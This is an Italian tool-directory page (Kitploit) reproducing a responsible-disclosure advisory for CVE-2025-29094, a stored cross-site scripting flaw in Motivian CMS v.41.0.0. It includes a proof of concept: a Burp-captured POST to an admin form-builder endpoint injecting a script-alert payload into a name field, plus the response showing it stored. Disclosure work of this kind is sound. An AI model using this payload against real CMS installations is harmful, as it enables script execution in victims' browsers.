Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS — Questo repository rivela una vulnerabilità di sicurezza scoperta in Motivian Content Management System v.41.0.0. | Kitploit
Strumenti/GitHubGitHub/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss
Analisi delle VulnerabilitàExploitRaccolta InformazioniSicurezza WebPenetration TestingApprendimento e Formazione
GitHubframarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

Questo repository rivela una vulnerabilità di sicurezza scoperta in Motivian Content Management System v.41.0.0.

Vedi Repository
27 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-29094-Multiple-Stored-Cross-Site-Scripting-XSS

Questo repository rivela una vulnerabilità di sicurezza scoperta in Motivian Content Management System v.41.0.0.

  • CVE-2025-29094: Multiple Stored Cross-Site Scripting (XSS)

Questa vulnerabilità è stata segnalata al venditore in conformità con le pratiche di divulgazione responsabile e a MITRE, che ha assegnato un ID CVE temporaneo. I dettagli vengono resi pubblici dopo la scadenza del periodo di divulgazione di 45 giorni.

Informazioni Generali

  • Titolo: Motivian Stored Cross Site Scripting (XSS)
  • Tipo di Vulnerabilità: Stored XSS
  • Venditore del Prodotto: Motivian
  • Prodotto: Motivian Content Management System
  • Versione Affetta: Motivian CMS v.41.0.0
  • Componenti Interessati: Marketing/Forms, Marketing/Offers, Content/Pages
  • Vettore di Attacco: Remoto
  • Impatto: Esecuzione arbitraria di JavaScript nel browser della vittima
  • Gravità: Alta
  • Punteggio CVSSv3: 7,6
  • Vettore CVSSv3: CVSS:3.1:AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N
  • Gravità secondo CISA-ADP: Media
  • Punteggio CVSSv3 secondo CISA-ADP: 6,1
  • Vettore CVSSv3 secondo CISA-ADP: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
  • Scoperta: 29-01-2025
  • Da: Francesco Marcuccio
  • Stato: Segnalato al venditore il 7 aprile 2025 - Nessuna risposta/correzione ricevuta entro il 22 maggio 2025
  • Descrizione

    Una vulnerabilità di Cross Site Scripting in Motivian Content Mangment System v.41.0.0 consente a un attaccante remoto di eseguire codice arbitrario attraverso i componenti Marketing/Forms, Marketing/Offers e Content/Pages. La vulnerabilità è stata sfruttata iniettando codice JavaScript dannoso in vari campi, tra cui il titolo in Marketing/Form e Marketing/Offers, e il campo header script in Content/Pages.

    Proof Of Concept

    La vulnerabilità può essere sfruttata attraverso vari campi in diversi componenti. A scopo dimostrativo, la seguente proof of concept si concentra su uno scenario specifico:

    1. Naviga alla sezione Marketing/Forms e crea un nuovo elemento del modulo.
    2. Inserisci uno script dannoso nel campo Nome e salva il modulo.

    Di seguito è riportata la trascrizione completa delle richieste e risposte HTTP utilizzate per dimostrare il problema:

    Burp Request

    root@kitploit:~
    POST /portal/admin/formbuilder/editCmsFormProps!saveForm.action HTTP/1.1
    Host: [REDACTED]
    Content-Length: 1362
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.5060.134 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: [REDACTED]
    Connection: close
    
    targetFieldId=&targetFormId=&targetFieldIndex=&openedTabProps=tab1&langSelected=it&form.id=1162&search_form_id=&search_form_status_id=&search_form_name=&search_form_description=&date_from=&date_to=&currentPage=&struts.token.name=EditCmsFormProps&EditCmsFormProps=DBFW4RH1O9SVF1J3J9TA0WSD5VHPJCKY&date_notification=&form.seoName_en=&form.seoName_el=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&[...]
    

    Burp Response

    root@kitploit:~
    HTTP/1.1 200 OK
    Connection: close
    Date: Wed, 05 Feb 2025 12:00:09 GMT
    Content-Type: text/html;charset=ISO-8859-1
    Content-Language: it-IT
    Content-Length: 94593
    
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head> <title>MOTIVIAN | Content Management</title> <link rel="shortcut icon" type="image/x-icon" href="/portal/favicon.ico"/> <link rel="icon" type="image/x-icon" href="/portal/favicon.ico"/> <script> <a href="javascript:void(0)" class="sortingRow" onclick="javascript:simplePagesFormDoSort('status','asc')" >Status</a></td> <td class="TableHeader" colspan="9" style="width:188px">Management</td> <td class="TableHeader w10">&nbsp;</td> </tr> </table> </td> </tr> <tr> <td class="w10 row_odd">&nbsp;</td> <td class="w70 row_odd"> <div class="check-box w70" style="float:left"> <input type="checkbox" id="subpages_formIds_id_1162" name="formIds" value="1162"> <label for="subpages_formIds_id_1162">1162 </label> </div> </td> <td class="w40 row_odd"><img src="https://raw.githubusercontent.com/framarcuccio/cve-2025-29094-multiple-stored-cross-site-scripting-xss/main/portal/assets/images/red_form.png"/></td> <td class="NameCol row_odd"> <div class="wrap_words_within_rows w155"><script>alert(document.domain)</script> [...]
    

    Rimedio

    Sanificare tutti gli input dell'utente e effettuare l'escape dell'output prima del rendering. Implementare l'intestazione CSP (Content Security Policy) per mitigare i rischi XSS.

    Cronologia della Divulgazione

    DataAzione
    06-02-2025Richiesta ID CVE (CNA: MITRE)
    02-04-2025Assegnazione ID CVE
    07-04-2025Vulnerabilità segnalate al venditore
    31-05-2025Divulgazione pubblica dopo la scadenza del periodo di divulgazione di 45 giorni (54 giorni totali)
    04-06-2025Registrazione ufficiale e inserimento nel database MITRE e nel portale NIST/NVD

    Crediti

    • Scoperta e divulgata responsabilmente da:
      Francesco Marcuccio
      Consulente Cybersecurity, Penetration Tester

    • Attribuzione dello scopritore da parte di MITRE come:
      Francesco Marcuccio
      Consulente Cybersecurity, Penetration Tester

    Link

    Link di riferimento: MITRE NIST

    Stato

    Questo ID CVE è ufficialmente in stato PUBBLICATO. Verrà aggiornato con il punteggio CVSS da NIST dopo l'analisi.

    Scarica lo strumento